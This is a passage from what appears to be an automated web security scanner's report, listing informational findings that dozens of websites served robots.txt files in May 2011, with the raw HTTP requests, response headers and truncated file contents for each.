# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.116. http://www.christnotes.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christnotes.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.christnotes.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 26 Oct 2005 01:44:46 GMT
ETag: "19b802b-4b-403fe66ac7f80"
Accept-Ranges: bytes
Content-Length: 75
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /style/
Disallow: /style-new/
Disallow: /-/amzn.asp

30.117. http://www.cirrusimage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cirrusimage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cirrusimage.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:29 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 14:06:46 GMT
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


30.118. http://www.classfinders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classfinders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classfinders.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:43:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 21 Oct 2010 14:39:43 GMT
ETag: "5405f-a5-493217f2249c0"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain

Sitemap: http://www.classfinders.com/sitemap.xml

User-agent: *
Disallow: /people/
Disallow: /search/
Disallow: /results/
Disallow: /ex/
Disallow: /ref_ad.php

30.119. http://www.clickinks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickinks.com

Response

HTTP/1.1 200 OK
Content-Length: 440
Content-Type: text/plain
Content-Location: http://www.clickinks.com/robots.txt
Last-Modified: Fri, 08 Oct 2010 10:31:28 GMT
Accept-Ranges: bytes
ETag: "528286f7d366cb1:40a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:49:24 GMT
Connection: close

...User-agent: *
Disallow: /Articles/images
Disallow: /3DSecure
Disallow: /EmailGeneration
Disallow: /GoogleCheckout
Disallow: /PayPalExpressCheckout
Disallow: /PopUps
Disallow: /scripts
Disal
...[SNIP]...

30.120. http://www.connectamarillo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connectamarillo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.connectamarillo.com

Response

HTTP/1.0 200 OK
Content-Length: 587
Content-Type: text/plain
Content-Location: http://www.connectamarillo.com/robots.txt
Last-Modified: Wed, 10 Dec 2008 17:34:11 GMT
Accept-Ranges: bytes
ETag: "f7125d83ed5ac91:12bd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 01 May 2011 23:38:12 GMT
Connection: close

User-agent: *
Disallow: /cms/
User-agent: *
Disallow: /includes/
User-agent: *
Disallow: /styles/
User-agent: *
Disallow: /xmlfiles/
User-agent: *
Disallow: /workarea/
User-agent: *
Disallo
...[SNIP]...

30.121. http://www.convergedirect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.convergedirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.convergedirect.com

Response

HTTP/1.1 200 OK
Content-Length: 275
Content-Type: text/plain
Last-Modified: Wed, 27 Apr 2011 16:13:38 GMT
Accept-Ranges: bytes
ETag: "16fb2d11f64cc1:2c0a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:26:07 GMT
Connection: close

User-agent: *
Disallow: /js/
Disallow: /flashy/
Disallow: /administration/
Disallow: /hartfordvideointro.shtml/
Disallow: /hartfordvideosample.shtml/
Disallow: /._flashy/
Disallow: /._flashy.cs
...[SNIP]...

30.122. http://www.copygator.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.copygator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.copygator.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:03 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Last-Modified: Tue, 20 Jan 2009 22:07:05 GMT
ETag: "c60c8e-17b3-49764b09"
Accept-Ranges: bytes
Content-Length: 6067
Connection: close
Content-Type: text/plain


User-agent: aipbot
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: AISearchBot
Disallow: /

User-agent: Alexibot
Disallow: /

User-agent: Aqua_Products
Disallow: /

User
...[SNIP]...

30.123. http://www.cosmeticscop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cosmeticscop.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Mar 2010 00:28:05 GMT
Accept-Ranges: bytes
ETag: "9afbeb7b1c0ca1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=4e704cc5-b001-4a6a-b5ff-d2aa9c1b6247; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close
Content-Length: 34

User-agent: *
Disallow: /staging/

30.124. http://www.countrytabs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countrytabs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.countrytabs.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/plain
Last-Modified: Sat, 06 Sep 2008 08:03:46 GMT
Accept-Ranges: bytes
ETag: "11ba2a16f7fc91:285"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:31:20 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /if/
Disallow: /ads/
Disallow: /mail/
Disallow: /upload/
Disallow: /members/
Disallow: /_scripts/
Disallow: /contact.asp
Disallow: /admin/
Disallow
...[SNIP]...

30.125. http://www.coupondad.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupondad.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coupondad.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:01 GMT
Server: Apache
Last-Modified: Sun, 13 Feb 2011 23:01:04 GMT
Accept-Ranges: bytes
Content-Length: 728
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-
Disallow: /search
Disallow: /category
Disallow: /tag
Disallow: /author
Disallow: /trackback
Disallow: /*trackback
Disallow: /*trackback*
Disallow: /*/tr
...[SNIP]...

30.126. http://www.craftjr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craftjr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craftjr.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Vary: Cookie
X-Pingback: http://www.craftjr.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.127. http://www.craigslistfoundation.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigslistfoundation.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslistfoundation.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:03:48 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 00:29:04 GMT
ETag: "39f8091-16-49f0754d9f400"
Accept-Ranges: bytes
Content-Length: 22
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.128. http://www.crankyape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crankyape.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Length: 881
Content-Type: text/plain
Last-Modified: Sat, 03 Apr 2010 09:40:29 GMT
Accept-Ranges: bytes
ETag: "d45941b211d3ca1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# robots.txt for http://www.crankyape.com
User-agent: *
Allow: /
Disallow: /aspnet_client/
Disallow: /ASPSpellCheck/
Disallow: /CO/
Disallow: /company/
Disallow: /DebugFile/
Disallow: /dotnet
...[SNIP]...

30.129. https://www.crankyape.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crankyape.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:53:39 GMT
Content-Length: 881
Content-Type: text/plain
Last-Modified: Sat, 03 Apr 2010 09:40:29 GMT
Accept-Ranges: bytes
ETag: "d45941b211d3ca1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# robots.txt for http://www.crankyape.com
User-agent: *
Allow: /
Disallow: /aspnet_client/
Disallow: /ASPSpellCheck/
Disallow: /CO/
Disallow: /company/
Disallow: /DebugFile/
Disallow: /dotnet
...[SNIP]...

30.130. http://www.creativekidsathome.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creativekidsathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creativekidsathome.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:22 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 12 Jan 2007 16:35:41 GMT
ETag: "38010dc-a0-7c8a3140"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-agent: ShopWiki
Disallow: /
User-agent: *
Disallow: /activities/images/
Disallow: /cgi-bin/
Disallow: /downloads/
Disallow: /images/
Disallow: /samples/



30.131. http://www.creditunionsonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditunionsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditunionsonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:51:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Tue, 05 Oct 2010 16:05:36 GMT
ETag: "df44cd-cf-491e0d4d0d400"
Accept-Ranges: bytes
Content-Length: 207
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.creditunionsonline.com/

User-agent: *
Disallow: /cgi-bin/    # keep outta the cgi
Disallow: /scripts/
Disallow: /static/
Sitemap: http://www.creditunionsonline.com/sitemap_in
...[SNIP]...

30.132. http://www.crengland.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crengland.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crengland.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:01 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_jk/1.2.26 PHP/5.2.9-2
Last-Modified: Tue, 03 Jun 2008 20:38:35 GMT
ETag: "2000000060b29-97-44ec918a88a89"
Accept-Ranges: bytes
Content-Length: 151
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /etools/driverapp/
Disallow: /etools/
Disallow: /errors/
Disallow: /metatags/
Disallow: /etools/job/
Disallow: /webapp/

30.133. http://www.cricbuzz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cricbuzz.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:08:23 GMT
Content-Type: text/plain
Content-Length: 5504
Last-Modified: Wed, 30 Jun 2010 11:55:18 GMT
Connection: close
cbz_srvr: garner.cricbuzz.com
Accept-Ranges: bytes

# Cricbuzz - The Interactive Cricket Portal
# Nothing very exciting here for you I'm afraid.
# Despictable and evil robots to keep out :)
User-agent: grub-client
Disallow: /

User-agent: grub
Disallo
...[SNIP]...

30.134. http://www.cumminsforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cumminsforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cumminsforum.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:03 GMT
Server: Apache
Last-Modified: Wed, 15 Aug 2007 01:36:43 GMT
Accept-Ranges: bytes
Content-Length: 1032
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/attachment.php
Disallow: /forums/calendar.php
Disallow: /forums/cron.php
Disallow: /forums/editpost.php
Disallow: /forums/global.php
Disallow
...[SNIP]...

30.135. http://www.cupcakesandcashmere.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cupcakesandcashmere.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cupcakesandcashmere.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Vary: Cookie
Content-Type: text/plain; charset=utf-8
Date: Sun, 01 May 2011 23:55:50 GMT
X-Pingback: http://cupcakesandcashmere.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-kcnkeakg=4F92A620E285AF2FF435559955FD9FBF; path=/

User-agent: *
Disallow:
Sitemap: http://cupcakesandcashmere.com/sitemap.xml.gz

30.136. http://www.dailynewnowa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailynewnowa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailynewnowa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:07 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

30.137. http://www.dallasguns.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasguns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dallasguns.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 03 Jan 2011 22:10:11 GMT
ETag: "1ca58e-80-498f86a6296c0"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/plain

# robots.txt formated following http://www.robotstxt.org/robotstxt.html guidelines
User-agent: *
Allow: /
Disallow: /cgi-bin/

30.138. http://www.dells.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dells.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dells.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:51:13 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 01 Jun 2010 20:49:19 GMT
ETag: "cb58a-658-487fe1b75f1c0"
Accept-Ranges: bytes
Content-Length: 1624
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:51:13 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.139. http://www.developer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.developer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.developer.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:34:37 GMT
ETag: "aa-49bf459289540"
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=722
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Length: 170
Connection: close

User-agent: *
Disallow: /images0/
Disallow: /icom_includes/
Disallow: /img/
Disallow: /javascript/
Disallow: /javascripts/
Disallow: /stylesheets/

Sitemap: /sitemap.xml

30.140. http://www.dezeen.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dezeen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dezeen.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 25 Apr 2011 20:54:32 GMT
Accept-Ranges: bytes
Content-Length: 370
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...

30.141. http://www.diabetesdaily.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diabetesdaily.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.5 SVN/1.6.9 Phusion_Passenger/2.2.11
Last-Modified: Sun, 01 May 2011 20:51:32 GMT
ETag: "dc270-892-4a23d12629d00"
Accept-Ranges: bytes
Content-Length: 2194
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:29:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_logs/
Disallow: /_marketing/
Disallow: /_notes/
Disallow: /_vbulletin/
Disallow: /ads/
Disallow: /content/printable/
Disallow: /css/
Disallow: /forum/admin/
Disallow: /forum/
...[SNIP]...

30.142. http://www.diabetesjournals.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesjournals.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diabetesjournals.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:47 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_jk/1.2.28 mod_ssl/2.2.14 OpenSSL/0.9.7a
Last-Modified: Wed, 13 Apr 2011 18:47:26 GMT
ETag: "307c4c4-dbb-4a0d13d6ceb80"
Accept-Ranges: bytes
Content-Length: 3515
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain


#
# ##################################################################
# ##
# ## THIS IS A GENERATED FILE.
# ##
# ## ANY CHANGES YOU MAKE DIRECTLY TO THIS FILE WILL BE OVERWRITTEN
# #
...[SNIP]...

30.143. http://www.docufide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docufide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.docufide.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:40 GMT
Server: docufide webserver
Set-Cookie: JSESSIONID=BFA3DE7A6A69D0BB63D37B970E8CB097; Path=/
Accept-Ranges: bytes
ETag: W/"57-1302855700000"
Last-Modified: Fri, 15 Apr 2011 08:21:40 GMT
Content-Length: 57
LB-node: This page took D=460 microseconds on prodweb1
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: LB-cookie-20480-prodweblb tomcat=AKODKIMAFAAA; Expires=Mon, 02-May-2011 03:29:59 GMT; Path=/

User-agent: *
Disallow: /documents/NCAA+TRS_06032010.pptx

30.144. http://www.dotmed.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotmed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotmed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:17 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /redirect.html
Disallow: /users/my/
Disallow: /listings/details.html
Disallow: /listings/detail.html
Disallow: /auctions/index.html
User-agent: BLP_bbot
Crawl-delay: 10
User-ag
...[SNIP]...

30.145. http://www.dotnetspark.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetspark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotnetspark.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 30 Apr 2011 15:52:23 GMT
Accept-Ranges: bytes
ETag: "c0bd5c984e7cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:23:32 GMT
Connection: close
Content-Length: 356

User-agent: *
Sitemap: http://www.dotnetspark.com/sitemap.xml

Disallow: /bin/
Disallow: /App_Data/
Disallow: /*.axd
Disallow: /*.swf
Disallow: /DotNetForum/*.aspx
Disallow: /DotNetResource/*.
...[SNIP]...

30.146. http://www.downloadroute.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downloadroute.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downloadroute.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 09 May 2009 07:29:08 GMT
ETag: "452001e-48-46975b35ab900"
Accept-Ranges: bytes
Content-Length: 72
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 00:08:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.downloadroute.com/sms.xml

User-agent: *
Disallow:

30.147. http://www.downv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downv.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:17 GMT
Server: Microsoft-IIS/6.5
Vary: *
Cache-Control: max-age=180
Expires: Mon, 02 May 2011 00:53:17 GMT
Last-Modified: Wed, 02 Sep 2009 08:04:32 GMT
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

30.148. http://www.drivewire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drivewire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drivewire.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:42 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 04:38:55 GMT
ETag: "1071c80-2fc-49df1309b35c0"
Accept-Ranges: bytes
Content-Length: 764
Keep-Alive: timeout=7, max=83
Connection: close
Content-Type: text/plain; charset=UTF-8

# C) Copy and Copyright 2007 DriveWire Inc. All Rights Reserved. http://www.drivewire.com/robots.txt
# DriveWire Inc. Does not allow unauthorized spiders and robots.
# Any unauthorized bot running
...[SNIP]...

30.149. http://www.droiddog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droiddog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.droiddog.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:22:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.droiddog.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: bb2_screener_=1304292121+173.193.214.243; path=/
Set-Cookie: PHPSESSID=f580e400cad935a20e0b52f4e1b3475b; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8


# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://www.droiddog.com/sitemap.xml
Sitemap: http://www.droiddog.com/sitemap-news.xml

User-agent: *
Disa
...[SNIP]...

30.150. http://www.drudge.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drudge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drudge.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:21 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 27 Jun 2008 17:32:41 GMT
ETag: "c302ff-7a-450a94bf6c040"
Accept-Ranges: bytes
Content-Length: 122
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: Mediapartners-Google*
Disallow:

User-agent: discobot
Disallow: /

Sitemap: /sitemap

30.151. http://www.earlham.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earlham.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.earlham.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:32 GMT
Server: Apache
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "fc0270-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:14:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.152. http://www.ec51.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ec51.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ec51.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.61
Date: Sun, 01 May 2011 21:23:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 1522
Last-Modified: Sat, 30 Apr 2011 23:29:11 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Age: 8317
X-Cache: HIT from 127.0.0.1
X-Cache-Lookup: HIT from 127.0.0.1:80
Via: 1.0 127.0.0.1 (squid/3.1.11)
Connection: close

#
# robots.txt for www.ec51.com!
#

User-agent: *
Disallow: /ucp/
Disallow: /acp/
Disallow: /keylist-
